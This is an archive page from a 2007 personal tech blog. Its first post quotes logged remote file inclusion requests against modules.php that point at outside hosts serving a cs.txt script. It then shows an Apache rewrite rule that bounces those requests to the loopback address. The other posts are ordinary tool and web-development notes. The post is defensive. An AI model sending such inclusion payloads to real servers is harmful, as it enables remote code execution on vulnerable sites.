Archive for October, 2007
How to frustrate a trojan bot script
Posted by Eric Bazerghi in Geek Stuff, Information Security, News on October 27, 2007
While doing some regular maintance on some websites I manage, I came across some interesting entries in the logs for one of our servers. Hundreds and hundreds of the following types of requests, originating from a wide variety of IP's:
GET /modules.php?op=http://cherrygirl.h18.ru/images/cs.txt?
GET /modules.php?op=http://amyru.h18.ru/images/cs.txt?
Basically, there are a bunch of 'infected' web servers out there which are trying to get our server to execute code stored in a file on a remote server. The file in the cases above is named 'cs.txt'. You can see the contents of the script/file by reading Dan Langille's sanitized version of the attack script.
While our server was not vulnerable to the attack, I was getting very annoyed with having to respond to the script each time it hit our server with a request. Our server had to run some code, determine that the page didn't exist, produce a page that a normal user would see explaining why their request could not be completed, etc. Then it hit me. Why are we spending all this precious cpu time for these attackers? Why not have them waste their own cpu time? And that's when I decided that the attack script should attack itself. In simple terms, when our web server notices an attack coming in, it simply redirects the request to the originating server. In essence, it's like requesting a webpage from a server, being told that the page has moved and be given a new address to go to. In this case, the new address is http://127.0.0.1. Without getting too technical, that's called a Loopback Address and is a network standard which always points to yourself.
Here's what I put in the Apache webserver httpd.conf file, which is the configuration file for the Apache web server on the Linux server I wanted to modify:
RewriteEngine on
RewriteCond %{QUERY_STRING} cs.txt? [NC]
RewriteRule ^.*$ http://127.0.0.1 [R=301,L]
So now, whenever a request comes in which contains the string 'cs.txt?' in the URL request, I inform the requester that the file they are requesting has been permanently moved to 'http://127.0.0.1', the loopback address and in essence, itself.
While the hits on the server continue, I have noticed they have slowed down, I'm assuming because the remote server is busy talking to itself for a moment. I also have the satisfaction of knowing our server isn't wasting its time with these trojan hits, and letting them talk to themselves for a bit instead.
More ‘tops’ to Keep you on Top
Posted by Eric Bazerghi in Blogs, Bookmarks, Geek Stuff, Linux, Reviews on October 11, 2007
Yesterday, I posted about how htop was my new replacement for top on all Linux systems I manage. Tonight, while looking through the Google search words that lead people to my site, I found a Google result page which contained a 'hit' that immediately caught my eye. Mike Malone, of the I'm Mike blog had an entry titled 'Top 5 tops: keep tabs on your system'. In it, he describes not only the htop utility I came across earlier, but 4 additional tops to make any Linux administrator smile.
- mtop (MySQL top) monitors a MySQL server showing the queries which are taking the most amount of time to complete. Features include 'zooming' in on a process to show the complete query, 'explaining' the query optimizer information for a query and 'killing' queries. In addition, server performance statistics, configuration information, and tuning tips are provided.
- Apachetop is a curses-based top-like display for Apache information, including requests per second, bytes per second, most popular URLs, etc.
- iftop does for network usage what top does for CPU usage. It listens to network traffic on a named interface and displays a table of current bandwidth usage by pairs of hosts. Handy for answering the question "why is our ADSL link so slow?".
- htop, an interactive process viewer for Linux
- atop is a performance monitor that can display:
- Resource consumption by all processes
- Utilization of all relevant resources
- Permanent logging of resource utilization
- Highlight critical resources
- Watch activity only
- Watch deviations only
- Accumulated process activity per user
- Accumulated process activity per program
- Disk and network activity per process
While I use mtop on a regular basis, and have now started using htop, the other 3 monitors definitely look like they're going to be part of my 'tools' for the various servers I manage. iftop and apachetop seem especially interesting to me, given their more specialized monitoring target.
htop – Unix top on steroids
Posted by Eric Bazerghi in Bookmarks, Geek Stuff, Linux on October 10, 2007
A coworker of mine showed me a small utility he read about on LifeHacker (Manage Processes with htop) this morning. I checked out the htop project site and quickly downloaded the source rpm and built the package and installed it on one of my Fedora boxes at home.
Here’s how htop compares to top, taken straight from the htop project site:
Comparison between htop and top
- In ‘htop’ you can scroll the list vertically and horizontally to see all processes and complete command lines.
- In ‘top’ you are subject to a delay for each unassigned key you press (especially annoying when multi-key escape sequences are triggered by accident).
- ‘htop’ starts faster (‘top’ seems to collect data for a while before displaying anything).
- In ‘htop’ you don’t need to type the process number to kill a process, in ‘top’ you do.
- In ‘htop’ you don’t need to type the process number or the priority value to renice a process, in ‘top’ you do.
- ‘htop’ supports mouse operation, ‘top’ doesn’t
- ‘top’ is older, hence, more used and tested.
All I can say is I’ll probably not use ‘top’ anymore. It’s htop for me going forward…
htop – an interactive process viewer for Linux – http://htop.sourceforge.net/
Sun’s Attempt at a Web-Based OS?
Posted by Eric Bazerghi in Ajax/Web 2.0, Geek Stuff, Reviews on October 9, 2007
Every now and then, Sun's Research group comes out with something that seems very interesting and leaves me wondering if this is the direction we might be heading in. It's difficult to describe Sun Labs Lively Kernel, so I'll simply quote from their website:
The Sun Labs Lively Kernel is a novel web programming environment developed by Project Flair at Sun Labs. The main goal of the Lively Kernel is to bring the same kind of simplicity, generality and flexibility to web programming that we have known in desktop programming for thirty years, but without the installation and upgrade hassles than conventional desktop applications have.
Remember all those rumors about how Google was developing an OS which would run in a browser? Well, this is the closest thing that I've seen to such a beast. When you visit the Sun Labs Lively Kernel page, click on the 'Enter Lively Kernel' tab to see the prototype in action. While performance was slow for me, it gives you a good idea of where we could be heading in the future.
Sun Labs Lively Kernel – http://research.sun.com/projects/lively/index.html
E-Mail Address Portability?
Posted by Eric Bazerghi in Geek Stuff, News on October 5, 2007
This week, someone decided to petition the FCC for something amazingly stupid: they want the FCC to force ISP's to provide 'e-mail address portability'. Just like with telephone numbers, this individual thinks it's a good idea.
This person doesn't seem to understand the difference between a phone number and a domain name. Domain names are actually entities, bought and owned by someone or a company. The key word is owned. You don't 'own' the email address, in essence, you're 'renting' it! You stop paying, or you move elsewhere, do you really expect the owner to keep handling your e-mail? Even the Postal Service doesn't do this! They'll forward your mail for a few weeks until you notify everyone, and then they're done and out of the loop.
Also, think about the inefficiencies of such a requirement. Over time, someone could change email addresses 2, 3, maybe even 5 times. Say I send an email to address #1 with a 10Mb attachment. According to this petition, the email sent to address #1 would be forwarded to address #2, then from there to address #3, until it gets to address #5. My email has been handled by 5 different ISP's, and they all had to absorb the cost of moving my bytes over to another ISP, and so on. Absolutely ridiculous if you ask me.
I'm all for asking ISP's to do something like this for a very short period of time, just like the Postal Service. But, I would do it somewhat differently. Instead of burdening the ISP's with handling large volumes of potentially large pieces of mail, why not have them issue a 'bounce' back to the sender, with a small note indicating the recipient has 'moved' and here is his/her new email address. We're now talking about an email with a size of 1000 to 2000 bytes, instead of in the megabytes. We avoid forwarding spam, and if the sender email doesn't exist, no second bounce is issued, avoiding a mail loop. I know of a few ISP's that already do this as a courtesy to their customers who have decided to move on. That's just good business if you ask me; never ignore an ex-client, because they might want to come back in the future.
So instead of petitioning for e-mail address portability, we should be asking ISP's to implement some sort of email 'address' forwarding/bounce functionality instead. It's cleaner, more efficient and much less of a burden on ISP's and the infrastructure as a whole.
Client Side Load Balancing for Web 2.0
Posted by Eric Bazerghi in Ajax/Web 2.0, Geek Stuff on October 5, 2007
So you’re writing a large web application, with multiple web servers on the front-end waiting to serve your users. First thing you do is start to think about a Load Balancing solution, be it a hardware solution such as a Coyote Point Systems box, or even a ‘software’ solution, such as Round Robin DNS. Now, with the advent of ‘Web 2.0’, we’re slowly seeing another ‘solution’ starting to gain some traction; Client Side Load Balancing.
To put it simply, we let each ‘client’ decide which server to connect to. Each client has a list of all available servers, and randomly selects one and attempts to exchange data. If the client receives a message indicating the server is busy, or no response at all within a set period of time, it moves to another server on the list until it can complete its transaction. Lei Zhu, a contributor at Digital Web, has this to say about the advantages of such a solution:
- Distribute loads among a cluster of application servers. Since the client randomly selects the server it connects to, the loads should be distributed evenly among the servers.
- Handle failover of an application server gracefully. The client has the ability to failover to another server when the chosen server does not respond within a preset period of time. The application server connection seamlessly fails over to another server.
- Ensure the cluster of servers appears to the end user as a single server. In the example, the user simply points a browser to http://www.myloadbalancedwebsite.com/. The actual server used is transparent to the user.
A big advantage to such a solution is that you don’t need to spend money on a hardware device, at least in the short-term. You can have some code on your back-end that monitors the web servers and removes any unavailable servers from the server list sent to each client.
Another advantage that Lei points out is that the web servers can be distributed anywhere geographically. Sure, this can be done with a load balancer, but it’s a far trickier and complicated setup then just having to change a server entry in a file sent to each client.
Lei’s article also includes a short write-up of an application, Voxlite, using such a design.
Overall, while I still have some doubts regarding the scalability of such a solution, it’s an interesting use of Web 2.0.
Digital Web Magazine – Client Side Load Balancing for Web 2.0 Applications
Firebug – The Web Development tool/add-on
Posted by Eric Bazerghi in Ajax/Web 2.0, CSS on October 4, 2007
I use Firefox as my main browser about 99% of the time, and one feature I love is the ability to extend its’ capabilities through the installation of ‘Add-ons’. One add-on that I’ve been using lately that has been a huge time saver for me is Firebug.
Firebug integrates with Firefox to put a wealth of web development tools at your fingertips while you browse. You can edit, debug, and monitor CSS, HTML, and JavaScript live in any web page.
It’s all there, all in your browser. Instant feedback on any changes you make during some CSS tweaking, etc.
Javascript Gallery and Slideshow System
Posted by Eric Bazerghi in Ajax/Web 2.0, Bookmarks, CSS on October 2, 2007
I'm always on the lookup for a slick way to display a series of images within a webpage. Jonathan Schemoul over at JonDesign has released SmoothGallery 2.0, and it looks very slick. Here's a small quote from his site that sums it all up:
"So, what is so cool about it ?
Unlike other systems out there, JonDesign's SmoothGallery is designed from the ground up to be standard compliant: You can feed it from any document, using custom css selectors.
And even better, this solutions is very lightweight: The javascript file is only 24kb."
For now, Jonathan's solution definitely is leaps and bounds ahead of other similar offerings, which either have less features, too many features, or horribly coded.
JonDesign's Smoothgallery 2.0 – http://smoothgallery.jondesign.net/
Coding a simple Ajax Calendar with a MySQL backend
Posted by Eric Bazerghi in Ajax/Web 2.0, Bookmarks on October 2, 2007
When doing any kind of web development, I always come across a time when I need to implement some sort of calendar; be it a small ‘applet’ enabling the user to select a date more effectively, or something a bit ‘larger’, displaying something more relevant for certain days.
Jamie over at www.nodstrum.com wrote up some code that can be used as an effective base for many ‘calendaring’ needs most web developers come across. It’s PHP and MySQL, so it should meet the needs of most folks out of the box, but can also be easily ported to another development language.
One word of caution; Jamie makes it clear that his priority was functionality and not security. As such, if you use his code, make sure to apply best-practices in regards to SQL injection, etc.
If you’re interested in how Jamie’s code evolved, check out these articles also on his site:
Calendar System – Easily using PHP & Script.aculo.us
MySQL Calendar
If all you’re looking for is a simple, elegant date ‘selector’, give DatePicker a look.